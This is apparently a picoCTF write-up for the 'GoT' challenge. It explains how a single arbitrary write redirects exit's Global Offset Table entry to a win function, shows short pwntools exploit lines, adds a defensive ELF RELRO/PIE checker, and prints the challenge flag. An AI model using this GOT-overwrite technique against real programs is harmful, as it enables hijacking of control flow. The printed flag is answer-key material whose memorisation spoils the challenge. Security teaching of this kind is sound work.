GoT

Problem

You can only change one address, here is the problem: program. It is also found in /problems/got_3_4ba3deeda2ea9b203c6a6425f183e7ed on the shell server. Source.

Solution

  1. The program asks for an address to overwrite with user-supplied data: one prompt for the address and another for the value to write.

  2. puts and exit are the only two functions called after the write, so we need to change the behavior of one of them. Because ASLR is enabled, we need to look for something whose address stays constant. One such thing is the Global Offset Table (GOT). The GOT is the table of addresses a C program jumps through when it calls libc functions. If we modify one of these jump targets, we can make the program execute code at a different address than intended.

  3. So we take the GOT address of the exit function and overwrite it with the address of the win function. pwntools makes this easy:

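     # exe is the pwntools ELF object for the challenge binary
     exit_got = exe.got['exit']     # address of exit's GOT entry
     win_addr = exe.symbols['win']  # address of the win function

  4. Then we simply send the addresses over and get the flag: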

     # Both values are sent as decimal strings
     io.sendlineafter("Input address\n", str(exit_got))
     io.sendlineafter("Input value?\n", str(win_addr))

  5. Run script.py like so: python script.py USER=username PASSWORD=password
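
The overwrite in steps 2 to 4 needs a GOT whose address is fixed and whose entries are writable. As an added example (not part of the original script or the challenge's code), the sketch below reads those two properties from an ELF's headers; got_exposure and sample_elf32 are hypothetical names, and the sample image is constructed.

```python
import struct

PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def got_exposure(data):
    """Return (fixed_address, relro_level) for an ELF image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64, end = data[4] == 2, "<" if data[5] == 1 else ">"
    (e_type,) = struct.unpack_from(end + "H", data, 16)
    (phoff,) = struct.unpack_from(end + ("Q" if is64 else "I"), data, 32 if is64 else 28)
    phentsize, phnum = struct.unpack_from(end + "HH", data, 54 if is64 else 42)
    relro = bind_now = False
    for i in range(phnum):
        off = phoff + i * phentsize
        if is64:
            p_type, _, p_offset, _, _, p_filesz = struct.unpack_from(end + "IIQQQQ", data, off)
        else:
            p_type, p_offset, _, _, p_filesz = struct.unpack_from(end + "5I", data, off)
        if p_type == PT_GNU_RELRO:
            relro = True
        elif p_type == PT_DYNAMIC:
            dfmt = end + ("QQ" if is64 else "II")
            dsz = struct.calcsize(dfmt)
            for pos in range(p_offset, p_offset + p_filesz - dsz + 1, dsz):
                tag, val = struct.unpack_from(dfmt, data, pos)
                if tag == 0:  # DT_NULL ends the dynamic array
                    break
                if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                    bind_now = True
    # ET_EXEC (2) means non-PIE: the GOT sits at the same address on every run.
    level = "full" if relro and bind_now else "partial" if relro else "none"
    return e_type == 2, level

def sample_elf32(e_type, relro, bind_now):
    """Constructed sample input: header-only 32-bit little-endian ELF image."""
    dyn = (struct.pack("<II", DT_FLAGS, DF_BIND_NOW) if bind_now else b"") + bytes(8)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0, 52, 32, 2, 0, 0, 0)
    phdrs = struct.pack("<8I", PT_DYNAMIC, 116, 0, 0, len(dyn), len(dyn), 6, 4)
    phdrs += struct.pack("<8I", PT_GNU_RELRO if relro else 0, 0, 0, 0, 0, 0, 4, 4)
    return ehdr + phdrs + dyn

if __name__ == "__main__":
    # Non-PIE, no RELRO: fixed GOT address and writable entries
    print(got_exposure(sample_elf32(2, relro=False, bind_now=False)))
```

Only a "full" result means the whole GOT is read-only after startup; with "partial" the function-pointer entries used for lazy binding stay writable. Building with PIE and -Wl,-z,relro,-z,now removes both preconditions.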

Flag

picoCTF{A_s0ng_0f_1C3_and_f1r3_1ef72b2d}
